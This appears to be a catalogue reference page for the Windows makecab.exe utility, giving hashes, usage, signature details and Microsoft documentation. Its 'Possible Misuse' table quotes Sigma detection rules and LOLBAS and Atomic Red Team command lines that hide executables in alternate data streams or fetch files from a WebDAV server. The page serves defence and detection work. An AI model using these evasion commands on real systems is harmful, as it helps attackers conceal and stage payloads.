makecab.exe

  • File Path: C:\Windows\SysWOW64\makecab.exe
  • Description: Microsoft Cabinet Maker

Hashes

Type Hash
MD5 83AD4EB39E30EAC18C01FA432B14F7DE
SHA1 E6B601C461BCCFA05DBDF722560172D157E509EF
SHA256 7661727CD39B5BA6F21E0D7B5ADE6DA8D55A9594D155A235553B58A10C054B43
SHA384 3134F8924740353478C4A5EA16F9202DF8297814525F954E6D30BCD1863C8C4622715092E1D1CF8D70F2379AD42F2E85
SHA512 9E3E67982358FCAE4FE3C9567B5C79343E88467689788487776356DE028E9A896FB63EC9B90EBB05AD2E118818D8B2F2563E3556A6B0C2B02CC597D7541A7B2E
SSDEEP 1536:QFHETnZXp+PoktsRQDsi7tMSBAlJUZDeZNUqH6mKCVYYY5WRlR+3olpMLLp6xEm/:QpETnBp+PoktsRQDsi7tMSBAlJUpeZND

Runtime Data

Usage (stdout):

Cabinet Maker - Lossless Data Compression Tool

MAKECAB [/V[n]] [/D var=value ...] [/L dir] source [destination]
MAKECAB [/V[n]] [/D var=value ...] /F directive_file [...]

  source         File to compress.
  destination    File name to give compressed file.  If omitted, the
                 last character of the source file name is replaced
                 with an underscore (_) and used as the destination.
  /F directives  A file with MakeCAB directives (may be repeated). Refer to
                 Microsoft Cabinet SDK for information on directive_file.
  /D var=value   Defines variable with specified value.
  /L dir         Location to place destination (default is current directory).
  /V[n]          Verbosity level (1..3).

Signature

  • Status: Signature verified.
  • Serial: 3300000266BD1580EFA75CD6D3000000000266
  • Thumbprint: A4341B9FD50FB9964283220A36A1EF6F6FAA7840
  • Issuer: CN=Microsoft Windows Production PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
  • Subject: CN=Microsoft Windows, O=Microsoft Corporation, L=Redmond, S=Washington, C=US

File Metadata

  • Original Filename: makecab.exe
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 5.00 (rs1_release.200407-1730)
  • Product Version: 5.00
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of makecab.exe being misused. While makecab.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma sysmon_suspicious_remote_thread.yml - '\makecab.exe' DRL 1.0
sigma proc_creation_win_alternate_data_streams.yml - 'makecab ' DRL 1.0
sigma proc_creation_win_apt_hafnium.yml Image\|endswith: '\makecab.exe' DRL 1.0
LOLBAS Makecab.yml Name: Makecab.exe  
LOLBAS Makecab.yml - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab  
LOLBAS Makecab.yml - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab  
LOLBAS Makecab.yml - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab  
LOLBAS Makecab.yml - Path: C:\Windows\System32\makecab.exe  
LOLBAS Makecab.yml - Path: C:\Windows\SysWOW64\makecab.exe  
LOLBAS Makecab.yml - IOC: Makecab retrieving files from Internet  
LOLBAS Makecab.yml - IOC: Makecab storing data into alternate data streams  
atomic-red-team T1564.004.md makecab #{path}\autoruns.exe #{path}\cabtest.txt:autoruns.cab MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


makecab

Applies to: Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012

Package existing files into a cabinet (.cab) file.

[!NOTE] This command is the same as the diantz command.

Syntax

makecab [/v[n]] [/d var=<value> ...] [/l <dir>] <source> [<destination>]
makecab [/v[<n>]] [/d var=<value> ...] /f <directives_file> [...]

Parameters

Parameter Description
<source> File to compress.
<destination> File name to give compressed file. If omitted, the last character of the source file name is replaced with an underscore (_) and used as the destination.
/f <directives_file> A file with makecab directives (may be repeated).
/d var=<value> Defines variable with specified value.
/l <dir> Location to place destination (default is current directory).
/v[<n>] Set debugging verbosity level (0=none,…,3=full).
/? Displays help at the command prompt.

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.